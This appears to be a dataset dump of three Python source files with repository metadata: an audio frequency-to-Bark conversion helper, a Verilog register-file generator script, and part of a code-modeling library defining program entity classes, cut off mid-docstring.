0.153846
null
null
0.076923
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
fc403c27d1d4da0e66a446351a2e2650278bc62d
1,527
py
Python
pyACA/ToolFreq2Bark.py
ruohoruotsi/pyACA
339e9395b65a217aa5965638af941b32d5c95454
[ "MIT" ]
81
2019-07-08T15:48:03.000Z
2022-03-21T22:52:25.000Z
pyACA/ToolFreq2Bark.py
ruohoruotsi/pyACA
339e9395b65a217aa5965638af941b32d5c95454
[ "MIT" ]
24
2019-10-03T19:20:18.000Z
2022-02-28T17:20:40.000Z
pyACA/ToolFreq2Bark.py
ruohoruotsi/pyACA
339e9395b65a217aa5965638af941b32d5c95454
[ "MIT" ]
26
2019-07-18T23:50:52.000Z
2022-03-10T14:59:35.000Z
# -*- coding: utf-8 -*- """ helper function: convert Hz to Bark scale Args: fInHz: The frequency to be converted, can be scalar or vector cModel: The name of the model ('Schroeder' [default], 'Terhardt', 'Zwicker', 'Traunmuller') Returns: Bark values of the input dimension """ import numpy as np import math def ToolFreq2Bark(fInHz, cModel = 'Schroeder'): def acaSchroeder_scalar(f): return 7 * math.asinh(f/650) def acaTerhardt_scalar(f): return 13.3 * math.atan(0.75 * f/1000) def acaZwicker_scalar(f): return 13 * math.atan(0.76 * f/1000) + 3.5 * math.atan(f/7500) def acaTraunmuller_scalar(f): return 26.81/(1+1960./f) - 0.53 f = np.asarray(fInHz) if f.ndim == 0: if cModel == 'Terhardt': return acaTerhardt_scalar(f) elif cModel == 'Zwicker': return acaZwicker_scalar(f) elif cModel == 'Traunmuller': return acaTraunmuller_scalar(f) else: return acaSchroeder_scalar(f) fBark = np.zeros(f.shape) if cModel == 'Terhardt': for k,fi in enumerate(f): fBark[k] = acaTerhardt_scalar(fi) elif cModel == 'Zwicker': for k,fi in enumerate(f): fBark[k] = acaZwicker_scalar(fi) elif cModel == 'Traunmuller': for k,fi in enumerate(f): fBark[k] = acaTraunmuller_scalar(fi) else: for k,fi in enumerate(f): fBark[k] = acaSchroeder_scalar(fi) return (fBark)
28.811321
95
0.591356
199
1,527
4.477387
0.38191
0.062851
0.058361
0.035915
0.107744
0.107744
0.107744
0.107744
0
0
0
0.040553
0.289456
1,527
52
96
29.365385
0.780645
0.18795
0
0.342857
0
0
0.049513
0
0
0
0
0
0
1
0.142857
false
0
0.057143
0.114286
0.457143
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
1
0
0
0
1
fc416ffd2f7c1bbdb707cd0d27fb98dd3ff367ba
881
py
Python
src/python/make_store_entry.py
kf7lsu/RegfileCompiler-public
0845f1458137cef06d584047bb4287a72c6afbab
[ "Apache-2.0" ]
null
null
null
src/python/make_store_entry.py
kf7lsu/RegfileCompiler-public
0845f1458137cef06d584047bb4287a72c6afbab
[ "Apache-2.0" ]
null
null
null
src/python/make_store_entry.py
kf7lsu/RegfileCompiler-public
0845f1458137cef06d584047bb4287a72c6afbab
[ "Apache-2.0" ]
null
null
null
#this code will generate the structural verilog for a single entry in the register file #takes in the output file manager, the entry number, the number of bits, the number of reads, and the width of the #tristate buffers on the read outputs #expects the same things as make_store_cell, ensure code is valid there #Matthew Trahms #EE 526 #4/20/21 from make_store_cell import make_store_cell def make_store_entry(out_file, entry_number, bits, reads, buff_width, regfile_num): #just need to create the correct number of bits #this and the make_store_array are going to be pretty simple for bit in range(bits): make_store_cell(out_file, entry_number, bit, reads, buff_width, regfile_num) return if __name__ == '__main__': f = open('store_entry_test.txt', 'w') rows = 4 cols = 2 reads = 2 for row in range(rows): make_store_entry(f, row, cols, reads, 1, 0) f.close()
31.464286
114
0.760499
157
881
4.063694
0.522293
0.098746
0.081505
0.056426
0.075235
0
0
0
0
0
0
0.017711
0.166856
881
27
115
32.62963
0.851499
0.496027
0
0
1
0
0.066667
0
0
0
0
0
0
1
0.076923
false
0
0.076923
0
0.230769
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc43b75bb4a6cda564bcd320da8b77c8174105e4
58,644
py
Python
bonsai/model.py
ipa-mirb/bonsai
cb73317cdf779566f7c496fc39546c9c689aa09c
[ "MIT" ]
null
null
null
bonsai/model.py
ipa-mirb/bonsai
cb73317cdf779566f7c496fc39546c9c689aa09c
[ "MIT" ]
null
null
null
bonsai/model.py
ipa-mirb/bonsai
cb73317cdf779566f7c496fc39546c9c689aa09c
[ "MIT" ]
null
null
null
#Copyright (c) 2017 Andre Santos # #Permission is hereby granted, free of charge, to any person obtaining a copy #of this software and associated documentation files (the "Software"), to deal #in the Software without restriction, including without limitation the rights #to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #copies of the Software, and to permit persons to whom the Software is #furnished to do so, subject to the following conditions: #The above copyright notice and this permission notice shall be included in #all copies or substantial portions of the Software. #THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN #THE SOFTWARE. ############################################################################### # Language Model ############################################################################### class CodeEntity(object): """Base class for all programming entities. All code objects have a file name, a line number, a column number, a programming scope (e.g. the function or code block they belong to) and a parent object that should have some variable or collection holding this object. """ def __init__(self, scope, parent): """Base constructor for code objects. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ self.scope = scope self.parent = parent self.file = None self.line = None self.column = None def walk_preorder(self): """Iterates the program tree starting from this object, going down.""" yield self for child in self._children(): for descendant in child.walk_preorder(): yield descendant def filter(self, cls, recursive=False): """Retrieves all descendants (including self) that are instances of a given class. Args: cls (class): The class to use as a filter. Kwargs: recursive (bool): Whether to descend recursively down the tree. """ source = self.walk_preorder if recursive else self._children return [ codeobj for codeobj in source() if isinstance(codeobj, cls) ] def _afterpass(self): """Finalizes the construction of a code entity.""" pass def _validity_check(self): """Check whether this object is a valid construct.""" return True def _children(self): """Yield all direct children of this object.""" # The default implementation has no children, and thus should return # an empty iterator. return iter(()) def _lookup_parent(self, cls): """Lookup a transitive parent object that is an instance of a given class.""" codeobj = self.parent while codeobj is not None and not isinstance(codeobj, cls): codeobj = codeobj.parent return codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ return (' ' * indent) + self.__str__() def ast_str(self, indent=0): """Return a minimal string to print a tree-like structure. Kwargs: indent (int): The number of indentation levels. """ line = self.line or 0 col = self.column or 0 name = type(self).__name__ spell = getattr(self, 'name', '[no spelling]') result = ' ({})'.format(self.result) if hasattr(self, 'result') else '' prefix = indent * '| ' return '{}[{}:{}] {}{}: {}'.format(prefix, line, col, name, result, spell) def __str__(self): """Return a string representation of this object.""" return self.__repr__() def __repr__(self): """Return a string representation of this object.""" return '[unknown]' class CodeStatementGroup(object): """This class is meant to provide common utility methods for objects that group multiple program statements together (e.g. functions, code blocks). It is not meant to be instantiated directly, only used for inheritance purposes. It defines the length of a statement group, and provides methods for integer-based indexing of program statements (as if using a list). """ def statement(self, i): """Return the *i*-th statement from the object's `body`.""" return self.body.statement(i) def statement_after(self, i): """Return the statement after the *i*-th one, or `None`.""" try: return self.statement(i + 1) except IndexError as e: return None def __getitem__(self, i): """Return the *i*-th statement from the object's `body`.""" return self.statement(i) def __len__(self): """Return the length of the statement group.""" return len(self.body) # ----- Common Entities ------------------------------------------------------- class CodeVariable(CodeEntity): """This class represents a program variable. A variable typically has a name, a type (`result`) and a value (or `None` for variables without a value or when the value is unknown). Additionally, a variable has an `id` which uniquely identifies it in the program (useful to resolve references), a list of references to it and a list of statements that write new values to the variable. If the variable is a *member*/*field*/*attribute* of an object, `member_of` should contain a reference to such object, instead of `None`. """ def __init__(self, scope, parent, id, name, result): """Constructor for variables. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. id: An unique identifier for this variable. name (str): The name of the variable in the program. result (str): The type of the variable in the program. """ CodeEntity.__init__(self, scope, parent) self.id = id self.name = name self.result = result self.value = None self.member_of = None self.references = [] self.writes = [] @property def is_definition(self): return True @property def is_local(self): """Whether this is a local variable. In general, a variable is *local* if its containing scope is a statement (e.g. a block), or a function, given that the variable is not one of the function's parameters. """ return (isinstance(self.scope, CodeStatement) or (isinstance(self.scope, CodeFunction) and self not in self.scope.parameters)) @property def is_global(self): """Whether this is a global variable. In general, a variable is *global* if it is declared directly under the program's global scope or a namespace. """ return isinstance(self.scope, (CodeGlobalScope, CodeNamespace)) @property def is_parameter(self): """Whether this is a function parameter.""" return (isinstance(self.scope, CodeFunction) and self in self.scope.parameters) @property def is_member(self): """Whether this is a member/attribute of a class or object.""" return isinstance(self.scope, CodeClass) def _add(self, codeobj): """Add a child (value) to this object.""" assert isinstance(codeobj, CodeExpression.TYPES) self.value = codeobj def _children(self): """Yield all direct children of this object.""" if isinstance(self.value, CodeEntity): yield self.value def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ return '{}{} {} = {}'.format(' ' * indent, self.result, self.name, pretty_str(self.value)) def __repr__(self): """Return a string representation of this object.""" return '[{}] {} = ({})'.format(self.result, self.name, self.value) class CodeFunction(CodeEntity, CodeStatementGroup): """This class represents a program function. A function typically has a name, a return type (`result`), a list of parameters and a body (a code block). It also has an unique `id` that identifies it in the program and a list of references to it. If a function is a method of some class, its `member_of` should be set to the corresponding class. """ def __init__(self, scope, parent, id, name, result, definition=True): """Constructor for functions. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. id: An unique identifier for this function. name (str): The name of the function in the program. result (str): The return type of the function in the program. """ CodeEntity.__init__(self, scope, parent) self.id = id self.name = name self.result = result self.parameters = [] self.body = CodeBlock(self, self, explicit=True) self.member_of = None self.references = [] self._definition = self if definition else None @property def is_definition(self): """Whether this is a function definition or just a declaration.""" return self._definition is self @property def is_constructor(self): """Whether this function is a class constructor.""" return self.member_of is not None def _add(self, codeobj): """Add a child (statement) to this object.""" assert isinstance(codeobj, (CodeStatement, CodeExpression)) self.body._add(codeobj) def _children(self): """Yield all direct children of this object.""" for codeobj in self.parameters: yield codeobj for codeobj in self.body._children(): yield codeobj def _afterpass(self): """Assign a function-local index to each child object and register write operations to variables. This should only be called after the object is fully built. """ if hasattr(self, '_fi'): return fi = 0 for codeobj in self.walk_preorder(): codeobj._fi = fi fi += 1 if isinstance(codeobj, CodeOperator) and codeobj.is_assignment: if codeobj.arguments and isinstance(codeobj.arguments[0], CodeReference): var = codeobj.arguments[0].reference if isinstance(var, CodeVariable): var.writes.append(codeobj) def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent params = ', '.join(map(lambda p: p.result + ' ' + p.name, self.parameters)) if self.is_constructor: pretty = '{}{}({}):\n'.format(spaces, self.name, params) else: pretty = '{}{} {}({}):\n'.format(spaces, self.result, self.name, params) if self._definition is not self: pretty += spaces + ' [declaration]' else: pretty += self.body.pretty_str(indent + 2) return pretty def __repr__(self): """Return a string representation of this object.""" params = ', '.join(map(str, self.parameters)) return '[{}] {}({})'.format(self.result, self.name, params) class CodeClass(CodeEntity): """This class represents a program class for object-oriented languages. A class typically has a name, an unique `id`, a list of members (variables, functions), a list of superclasses, and a list of references. If a class is defined within another class (inner class), it should have its `member_of` set to the corresponding class. """ def __init__(self, scope, parent, id_, name, definition=True): """Constructor for classes. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. id: An unique identifier for this class. name (str): The name of the class in the program. """ CodeEntity.__init__(self, scope, parent) self.id = id_ self.name = name self.members = [] self.superclasses = [] self.member_of = None self.references = [] self._definition = self if definition else None @property def is_definition(self): """Whether this is a definition or a declaration of the class.""" return self._definition is self def _add(self, codeobj): """Add a child (function, variable, class) to this object.""" assert isinstance(codeobj, (CodeFunction, CodeVariable, CodeClass)) self.members.append(codeobj) codeobj.member_of = self def _children(self): """Yield all direct children of this object.""" for codeobj in self.members: yield codeobj def _afterpass(self): """Assign the `member_of` of child members and call their `_afterpass()`. This should only be called after the object is fully built. """ for codeobj in self.members: if not codeobj.is_definition: if not codeobj._definition is None: codeobj._definition.member_of = self codeobj._afterpass() def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent pretty = spaces + 'class ' + self.name if self.superclasses: superclasses = ', '.join(self.superclasses) pretty += '(' + superclasses + ')' pretty += ':\n' if self.members: pretty += '\n\n'.join( c.pretty_str(indent + 2) for c in self.members ) else: pretty += spaces + ' [declaration]' return pretty def __repr__(self): """Return a string representation of this object.""" return '[class {}]'.format(self.name) class CodeNamespace(CodeEntity): """This class represents a program namespace. A namespace is a concept that is explicit in languages such as C++, but less explicit in many others. In Python, the closest thing should be a module. In Java, it may be the same as a class, or non-existent. A namespace typically has a name and a list of children objects (variables, functions or classes). """ def __init__(self, scope, parent, name): """Constructor for namespaces. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the namespace in the program. """ CodeEntity.__init__(self, scope, parent) self.name = name self.children = [] def _add(self, codeobj): """Add a child (namespace, function, variable, class) to this object.""" assert isinstance(codeobj, (CodeNamespace, CodeClass, CodeFunction, CodeVariable)) self.children.append(codeobj) def _children(self): """Yield all direct children of this object.""" for codeobj in self.children: yield codeobj def _afterpass(self): """Call the `_afterpass()` of child objects. This should only be called after the object is fully built. """ for codeobj in self.children: codeobj._afterpass() def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent pretty = '{}namespace {}:\n'.format(spaces, self.name) pretty += '\n\n'.join(c.pretty_str(indent + 2) for c in self.children) return pretty def __repr__(self): """Return a string representation of this object.""" return '[namespace {}]'.format(self.name) class CodeGlobalScope(CodeEntity): """This class represents the global scope of a program. The global scope is the root object of a program. If there are no better candidates, it is the `scope` and `parent` of all other objects. It is also the only object that does not have a `scope` or `parent`. """ def __init__(self): """Constructor for global scope objects.""" CodeEntity.__init__(self, None, None) self.children = [] def _add(self, codeobj): """Add a child (namespace, function, variable, class) to this object.""" assert isinstance(codeobj, (CodeNamespace, CodeClass, CodeFunction, CodeVariable)) self.children.append(codeobj) def _children(self): """Yield all direct children of this object.""" for codeobj in self.children: yield codeobj def _afterpass(self): """Call the `_afterpass()` of child objects. This should only be called after the object is fully built. """ for codeobj in self.children: codeobj._afterpass() def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ return '\n\n'.join( codeobj.pretty_str(indent=indent) for codeobj in self.children ) # ----- Expression Entities --------------------------------------------------- class CodeExpression(CodeEntity): """Base class for expressions within a program. Expressions can be of many types, including literal values, operators, references and function calls. This class is meant to be inherited from, and not instantiated directly. An expression typically has a name (e.g. the name of the function in a function call) and a type (`result`). Also, an expression should indicate whether it is enclosed in parentheses. """ def __init__(self, scope, parent, name, result, paren=False): """Constructor for expressions. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the expression in the program. result (str): The return type of the expression in the program. Kwargs: paren (bool): Whether the expression is enclosed in parentheses. """ CodeEntity.__init__(self, scope, parent) self.name = name self.result = result self.parenthesis = paren @property def function(self): """The function where this expression occurs.""" return self._lookup_parent(CodeFunction) @property def statement(self): """The statement where this expression occurs.""" return self._lookup_parent(CodeStatement) def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ if self.parenthesis: return (' ' * indent) + '(' + self.name + ')' return (' ' * indent) + self.name def __repr__(self): """Return a string representation of this object.""" return '[{}] {}'.format(self.result, self.name) class SomeValue(CodeExpression): """This class represents an unknown value for diverse primitive types.""" def __init__(self, result): """Constructor for unknown values.""" CodeExpression.__init__(self, None, None, result, result) def _children(self): """Yield all the children of this object, that is no children.""" return iter(()) SomeValue.INTEGER = SomeValue("int") SomeValue.FLOATING = SomeValue("float") SomeValue.CHARACTER = SomeValue("char") SomeValue.STRING = SomeValue("string") SomeValue.BOOL = SomeValue("bool") class CodeLiteral(CodeExpression): """Base class for literal types not present in Python. This class is meant to represent a literal whose type is not numeric, string or boolean, as bare Python literals are used for those. A literal has a value (e.g. a list `[1, 2, 3]`) and a type (`result`), and could be enclosed in parentheses. It does not have a name. """ def __init__(self, scope, parent, value, result, paren=False): """Constructor for literals. As literals have no name, a constant string is used instead. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. value (CodeExpression|CodeExpression[]): This literal's value. result (str): The return type of the literal in the program. Kwargs: paren (bool): Whether the literal is enclosed in parentheses. """ CodeExpression.__init__(self, scope, parent, 'literal', result, paren) self.value = value def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ if self.parenthesis: return '{}({})'.format(' ' * indent, pretty_str(self.value)) return pretty_str(self.value, indent=indent) def __repr__(self): """Return a string representation of this object.""" return '[{}] {!r}'.format(self.result, self.value) CodeExpression.TYPES = (int, long, float, bool, basestring, SomeValue, CodeLiteral, CodeExpression) CodeExpression.LITERALS = (int, long, float, bool, basestring, CodeLiteral) class CodeNull(CodeLiteral): """This class represents an indefinite value. Many programming languages have their own version of this concept: Java has null references, C/C++ NULL pointers, Python None and so on. """ def __init__(self, scope, parent, paren=False): """Constructor for null literals. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. Kwargs: paren (bool): Whether the null literal is enclosed in parentheses. """ CodeLiteral.__init__(self, scope, parent, None, 'null', paren) def _children(self): """Yield all the children of this object, that is no children. This class inherits from CodeLiteral just for consistency with the class hierarchy. It should have no children, thus an empty iterator is returned. """ return iter(()) class CodeCompositeLiteral(CodeLiteral): """This class represents a composite literal. A composite literal is any type of literal whose value is compound, rather than simple. An example present in many programming languages are list literals, often constructed as `[1, 2, 3]`. A composite literal has a sequence of values that compose it (`values`), a type (`result`), and it should indicate whether it is enclosed in parentheses. """ def __init__(self, scope, parent, result, value=(), paren=False): """Constructor for a compound literal. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. value (iterable): The initial value sequence in this composition. result (str): The return type of the literal in the program. Kwargs: paren (bool): Whether the literal is enclosed in parentheses. """ try: value = list(value) except TypeError as te: raise AssertionError(str(te)) CodeLiteral.__init__(self, scope, parent, value, result, paren) @property def values(self): return tuple(self.value) def _add_value(self, child): """Add a value to the sequence in this composition.""" self.value.append(child) def _children(self): """Yield all direct children of this object.""" for value in self.value: if isinstance(value, CodeEntity): yield value def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ indent = ' ' * indent values = '{{{}}}'.format(', '.join(map(pretty_str, self.value))) if self.parenthesis: return '{}({})'.format(indent, values) return '{}{}'.format(indent, values) def __repr__(self): """Return a string representation of this object.""" return '[{}] {{{}}}'.format(self.result, ', '.join(map(repr, self.value))) class CodeReference(CodeExpression): """This class represents a reference expression (e.g. to a variable). A reference typically has a name (of what it is referencing), and a return type. If the referenced entity is known, `reference` should be set. If the reference is a field/attribute of an object, `field_of` should be set to that object. """ def __init__(self, scope, parent, name, result, paren=False): """Constructor for references. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the reference in the program. result (str): The return type of the expression in the program. Kwargs: paren (bool): Whether the reference is enclosed in parentheses. """ CodeExpression.__init__(self, scope, parent, name, result, paren) self.field_of = None self.reference = None def _set_field(self, codeobj): """Set the object that contains the attribute this is a reference of.""" assert isinstance(codeobj, CodeExpression) self.field_of = codeobj def _children(self): """Yield all direct children of this object.""" if self.field_of: yield self.field_of def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent pretty = '{}({})' if self.parenthesis else '{}{}' name = ('{}.{}'.format(self.field_of.pretty_str(), self.name) if self.field_of else self.name) return pretty.format(spaces, name) def __str__(self): """Return a string representation of this object.""" return '#' + self.name def __repr__(self): """Return a string representation of this object.""" if self.field_of: return '[{}] ({}).{}'.format(self.result, self.field_of, self.name) return '[{}] #{}'.format(self.result, self.name) class CodeOperator(CodeExpression): """This class represents an operator expression (e.g. `a + b`). Operators can be unary or binary, and often return numbers or booleans. Some languages also support ternary operators. Do note that assignments are often considered expressions, and, as such, assignment operators are included here. An operator typically has a name (its token), a return type, and a tuple of its arguments. """ _UNARY_TOKENS = ("+", "-") _BINARY_TOKENS = ("+", "-", "*", "/", "%", "<", ">", "<=", ">=", "==", "!=", "&&", "||", "=") def __init__(self, scope, parent, name, result, args=None, paren=False): """Constructor for operators. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the operator in the program. result (str): The return type of the operator in the program. Kwargs: args (tuple): Initial tuple of arguments. paren (bool): Whether the expression is enclosed in parentheses. """ CodeExpression.__init__(self, scope, parent, name, result, paren) self.arguments = args or () @property def is_unary(self): """Whether this is a unary operator.""" return len(self.arguments) == 1 @property def is_binary(self): """Whether this is a binary operator.""" return len(self.arguments) == 2 @property def is_ternary(self): """Whether this is a ternary operator.""" return len(self.arguments) == 3 @property def is_assignment(self): """Whether this is an assignment operator.""" return self.name == "=" def _add(self, codeobj): """Add a child (argument) to this object.""" assert isinstance(codeobj, CodeExpression.TYPES) self.arguments = self.arguments + (codeobj,) def _children(self): """Yield all direct children of this object.""" for codeobj in self.arguments: if isinstance(codeobj, CodeExpression): yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ indent = ' ' * indent pretty = '{}({})' if self.parenthesis else '{}{}' if self.is_unary: operator = self.name + pretty_str(self.arguments[0]) else: operator = '{} {} {}'.format(pretty_str(self.arguments[0]), self.name, pretty_str(self.arguments[1])) return pretty.format(indent, operator) def __repr__(self): """Return a string representation of this object.""" if self.is_unary: return '[{}] {}({})'.format(self.result, self.name, self.arguments[0]) if self.is_binary: return '[{}] ({}){}({})'.format(self.result, self.arguments[0], self.name, self.arguments[1]) return '[{}] {}'.format(self.result, self.name) class CodeFunctionCall(CodeExpression): """This class represents a function call. A function call typically has a name (of the called function), a return type, a tuple of its arguments and a reference to the called function. If a call references a class method, its `method_of` should be set to the object on which a method is being called. """ def __init__(self, scope, parent, name, result, paren=False): """Constructor for function calls. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the function in the program. result (str): The return type of the expression in the program. Kwargs: paren (bool): Whether the expression is enclosed in parentheses. """ CodeExpression.__init__(self, scope, parent, name, result, paren) self.full_name = name self.arguments = () self.method_of = None self.reference = None @property def is_constructor(self): """Whether the called function is a constructor.""" return self.result == self.name def _add(self, codeobj): """Add a child (argument) to this object.""" assert isinstance(codeobj, CodeExpression.TYPES) self.arguments = self.arguments + (codeobj,) def _set_method(self, codeobj): """Set the object on which a method is called.""" assert isinstance(codeobj, CodeExpression) self.method_of = codeobj def _children(self): """Yield all direct children of this object.""" if self.method_of: yield self.method_of for codeobj in self.arguments: if isinstance(codeobj, CodeExpression): yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ indent = ' ' * indent pretty = '{}({})' if self.parenthesis else '{}{}' args = ', '.join(map(pretty_str, self.arguments)) if self.method_of: call = '{}.{}({})'.format(self.method_of.pretty_str(), self.name, args) elif self.is_constructor: call = 'new {}({})'.format(self.name, args) else: call = '{}({})'.format(self.name, args) return pretty.format(indent, call) def __repr__(self): """Return a string representation of this object.""" args = ', '.join(map(str, self.arguments)) if self.is_constructor: return '[{}] new {}({})'.format(self.result, self.name, args) if self.method_of: return '[{}] {}.{}({})'.format(self.result, self.method_of.name, self.name, args) return '[{}] {}({})'.format(self.result, self.name, args) class CodeDefaultArgument(CodeExpression): """This class represents a default argument. Some languages, such as C++, allow function parameters to have default values when not explicitly provided by the programmer. This class represents such omitted arguments. A default argument has only a return type. """ def __init__(self, scope, parent, result): """Constructor for default arguments. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. result (str): The return type of the argument in the program. """ CodeExpression.__init__(self, scope, parent, '(default)', result) # ----- Statement Entities ---------------------------------------------------- class CodeStatement(CodeEntity): """Base class for program statements. Programming languages often define diverse types of statements (e.g. return statements, control flow, etc.). This class provides common functionality for such statements. In many languages, statements must be contained within a function. An operator typically has a name (its token), a return type, and a tuple of its arguments. """ def __init__(self, scope, parent): """Constructor for statements. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ CodeEntity.__init__(self, scope, parent) self._si = -1 @property def function(self): """The function where this statement appears in.""" return self._lookup_parent(CodeFunction) class CodeJumpStatement(CodeStatement): """This class represents a jump statement (e.g. `return`, `break`). A jump statement has a name. In some cases, it may also have an associated value (e.g. `return 0`). """ def __init__(self, scope, parent, name): """Constructor for jump statements. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the statement in the program. """ CodeStatement.__init__(self, scope, parent) self.name = name self.value = None def _add(self, codeobj): """Add a child (value) to this object.""" assert isinstance(codeobj, CodeExpression.TYPES) self.value = codeobj def _children(self): """Yield all direct children of this object.""" if isinstance(self.value, CodeExpression): yield self.value def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ indent = ' ' * indent if self.value is not None: return '{}{} {}'.format(indent, self.name, pretty_str(self.value)) return indent + self.name def __repr__(self): """Return a string representation of this object.""" if self.value is not None: return '{} {}'.format(self.name, str(self.value)) return self.name class CodeExpressionStatement(CodeStatement): """This class represents an expression statement. It is only a wrapper. Many programming languages allow expressions to be statements on their own. A common example is the assignment operator, which can be a statement on its own, but also returns a value when contained within a larger expression. """ def __init__(self, scope, parent, expression=None): """Constructor for expression statements. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. Kwargs: expression (CodeExpression): The expression of this statement. """ CodeStatement.__init__(self, scope, parent) self.expression = expression def _children(self): """Yield all direct children of this object.""" if isinstance(self.expression, CodeExpression): yield self.expression def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ return pretty_str(self.expression, indent=indent) def __repr__(self): """Return a string representation of this object.""" return repr(self.expression) class CodeBlock(CodeStatement, CodeStatementGroup): """This class represents a code block (e.g. `{}` in C, C++, Java, etc.). Blocks are little more than collections of statements, while being considered a statement themselves. Some languages allow blocks to be implicit in some contexts, e.g. an `if` statement omitting curly braces in C, C++, Java, etc. This model assumes that control flow branches and functions always have a block as their body. """ def __init__(self, scope, parent, explicit=True): """Constructor for code blocks. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. Kwargs: explicit (bool): Whether the block is explicit in the code. """ CodeStatement.__init__(self, scope, parent) self.body = [] self.explicit = explicit def statement(self, i): """Return the *i*-th statement of this block.""" return self.body[i] def _add(self, codeobj): """Add a child (statement) to this object.""" assert isinstance(codeobj, CodeStatement) codeobj._si = len(self.body) self.body.append(codeobj) def _children(self): """Yield all direct children of this object.""" for codeobj in self.body: yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ if self.body: return '\n'.join(stmt.pretty_str(indent) for stmt in self.body) else: return (' ' * indent) + '[empty]' def __repr__(self): """Return a string representation of this object.""" return str(self.body) class CodeDeclaration(CodeStatement): """This class represents a declaration statement. Some languages, such as C, C++ or Java, consider this special kind of statement for declaring variables within a function, for instance. A declaration statement contains a list of all declared variables. """ def __init__(self, scope, parent): """Constructor for declaration statements. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ CodeStatement.__init__(self, scope, parent) self.variables = [] def _add(self, codeobj): """Add a child (variable) to this object.""" assert isinstance(codeobj, CodeVariable) self.variables.append(codeobj) def _children(self): """Yield all direct children of this object.""" for codeobj in self.variables: yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent return spaces + ', '.join(v.pretty_str() for v in self.variables) def __repr__(self): """Return a string representation of this object.""" return str(self.variables) class CodeControlFlow(CodeStatement, CodeStatementGroup): """Base class for control flow structures (e.g. `for` loops). Control flow statements are assumed to have, at least, one branch (a boolean condition and a `CodeBlock` that is executed when the condition is met). Specific implementations may consider more branches, or default branches (executed when no condition is met). A control flow statement typically has a name. """ def __init__(self, scope, parent, name): """Constructor for control flow structures. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the control flow statement in the program. """ CodeStatement.__init__(self, scope, parent) self.name = name self.condition = True self.body = CodeBlock(scope, self, explicit=False) def get_branches(self): """Return a list of branches, where each branch is a pair of condition and respective 